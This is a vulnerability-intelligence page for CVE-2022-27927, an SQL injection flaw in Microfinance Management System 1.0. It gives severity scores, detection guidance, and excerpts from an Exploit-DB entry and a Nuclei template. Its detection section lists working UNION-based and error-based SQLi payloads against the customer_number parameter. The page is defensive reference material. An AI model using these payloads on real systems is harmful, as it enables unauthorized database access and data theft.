CVE-2022-27927
published 2022-04-19CVE-2022-27927: A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL…
PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
13.63%
96.0th percentile
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microfinance_management_system_project | microfinance_management_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'↗
url/mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27↗
commandcustomer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'↗
- →Detect SQL injection attempts against the vulnerable endpoint by monitoring GET requests to /mims/updatecustomer.php with a manipulated 'customer_number' parameter containing SQL metacharacters or UNION/SELECT payloads. ↗
- →The Nuclei template matcher checks for the md5 of '999999999' in the HTTP response body from /mims/updatecustomer.php, which confirms successful UNION-based SQL injection exploitation. ↗
- →Monitor HTTP Referer header value 'http://localhost/mims/managecustomer.php' combined with SQLi payloads in the customer_number parameter as an indicator of exploitation attempts originating from the manage customer page. ↗
- →Error-based SQLi payloads targeting this CVE use INFORMATION_SCHEMA.COLLATIONS with FLOOR(RAND(0)*2) and GROUP BY to trigger MySQL errors; alert on these patterns in query strings to /mims/updatecustomer.php. ↗
- ·The CVE also affects the 'course_code' parameter in addition to 'customer_number'; detection rules should cover both parameters. ↗
- ·The Nuclei template uses a single GET request (max-request: 1) targeting /mims/updatecustomer.php with a UNION-based payload; detection tuned only for this endpoint may miss exploitation via other vulnerable parameters or endpoints. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microfinance Management System 1.0 - 'customer_number' SQLi
exploitdb·2022-05-11·CVSS 9.8
CVE-2022-27927 [CRITICAL] Microfinance Management System 1.0 - 'customer_number' SQLi
Microfinance Management System 1.0 - 'customer_number' SQLi
---
# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi
# Date: 2022-25-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-27927
# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
1. Description:
Microfinance Management System allows SQL Injection via parameter 'customer_number' in
/mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit
Nuclei
Microfinance Management System 1.0 - SQL Injection
nuclei·CVSS 9.8
CVE-2022-27927 [CRITICAL] Microfinance Management System 1.0 - SQL Injection
Microfinance Management System 1.0 - SQL Injection
Microfinance Management System 1.0 is susceptible to SQL Injection.
Template:
id: CVE-2022-27927
info:
name: Microfinance Management System 1.0 - SQL Injection
author: lucasljm2001,ekrause
severity: critical
description: |
Microfinance Management System 1.0 is susceptible to SQL Injection.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
- https://www.sourcecodester.com
No writeups or analysis indexed.
http://packetstormsecurity.com/files/167017/Microfinance-Management-System-1.0-SQL-Injection.htmlhttps://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticatedhttps://www.sourcecodester.com/php/14822/microfinance-management-system.htmlhttp://packetstormsecurity.com/files/167017/Microfinance-Management-System-1.0-SQL-Injection.htmlhttps://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticatedhttps://www.sourcecodester.com/php/14822/microfinance-management-system.html
2022-04-19
Published